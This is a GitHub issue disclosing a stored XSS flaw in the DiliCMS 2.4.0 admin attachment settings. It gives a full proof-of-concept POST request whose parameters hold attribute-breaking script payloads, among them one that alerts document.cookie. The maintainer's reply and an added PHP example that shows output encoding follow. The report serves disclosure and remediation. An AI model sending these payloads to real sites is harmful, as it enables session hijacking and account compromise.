This repository has been archived by the owner on Jan 10, 2019. It is now read-only.

XSS Vulnerability Found in DiliCMS 2.4.0 in tab=site_attachment #59

Closed
PrincyEdward opened this issue Oct 10, 2018 · 1 comment

@PrincyEdward

XSS Vulnerability Found in DiliCMS 2.4.0 in tab=site_attachment
Software Link: https://github.com/chekun/DiliCMS/tree/v2.4.0
POC:
POST /DiliCMS-2.4.0/admin/index.php/setting/site?tab=site_attachment HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/DiliCMS-2.4.0/admin/index.php/setting/site?tab=site_attachment
Content-Type: application/x-www-form-urlencoded
Content-Length: 273
Cookie: dili_session=xxxxx
Connection: close
Upgrade-Insecure-Requests: 1

dilicms_csrf_token=6f4a225b12c2c472984c72af51fdf31b&attachment_url=aaa%22%3E%3Cbody+onload%3Dalert%28document.cookie%29%3E&attachment_dir=attachments&attachment_type=*.jpg%3B*.gif%3B*.png%3B*.doc%20%22+onmouseover%3Dprompt%28907460%29+bad%3D%22&attachment_maxupload=2097152

Screenshots: payload, popup2, popup1 (images not reproduced in this text)

@chekun (Owner)

chekun commented Oct 11, 2018

Yes, thank you. But DiliCMS is not software for production, literally.
This vulnerability can be easily fixed by setting global_xss_filtering to true in the config file https://github.com/chekun/DiliCMS/blob/v2.4.0/application/config/config.php#L282
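For context on the maintainer's suggestion: CodeIgniter's `global_xss_filtering` sanitises request input on the way in, whereas the attribute injection in the POC is fixed for good by encoding at the output side. The following is an added example, not DiliCMS code; it assumes the settings view echoes the saved values into `value="..."` attributes, and the field names and payloads are taken from the POC body above.

```php
<?php
// Added example (not DiliCMS code). Assumes the settings view echoes the saved
// values back into value="..." attributes; field names come from the POC body.

// Constructed input: the two injected parameters from the POC, URL-decoded.
$post = [];
parse_str(
    'attachment_url=aaa%22%3E%3Cbody+onload%3Dalert%28document.cookie%29%3E'
    . '&attachment_type=*.jpg%3B*.gif%3B*.png%3B*.doc%20%22+onmouseover%3Dprompt%28907460%29+bad%3D%22',
    $post
);

// Vulnerable pattern: the raw value is concatenated into a quoted attribute,
// so a " in the value ends the attribute and the remainder becomes markup.
function render_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Output-side fix: encode for the HTML attribute context. This holds whatever
// the input filter did, so it does not depend on global_xss_filtering.
function render_safe(string $name, string $value): string
{
    $enc = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="' . $name . '" value="' . $enc . '">';
}

// Check: parse the fragment and confirm exactly one <input> exists, carrying
// only the three attributes the template wrote, with the original value intact.
// The first payload adds a <body> tag, the second adds an onmouseover attribute;
// both fail this check when rendered unencoded and pass when encoded.
function value_round_trips(string $html, string $expected): bool
{
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    $inputs = $doc->getElementsByTagName('input');
    if ($inputs->length !== 1) {
        return false;
    }
    $input = $inputs->item(0);
    return $input->attributes->length === 3
        && $input->getAttribute('value') === $expected;
}

foreach ($post as $name => $value) {
    foreach (['unsafe' => render_unsafe($name, $value), 'safe' => render_safe($name, $value)] as $mode => $html) {
        printf("%-15s %-6s intact=%s  %s\n", $name, $mode,
            var_export(value_round_trips($html, $value), true), $html);
    }
}
```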

@chekun chekun closed this as completed Oct 14, 2018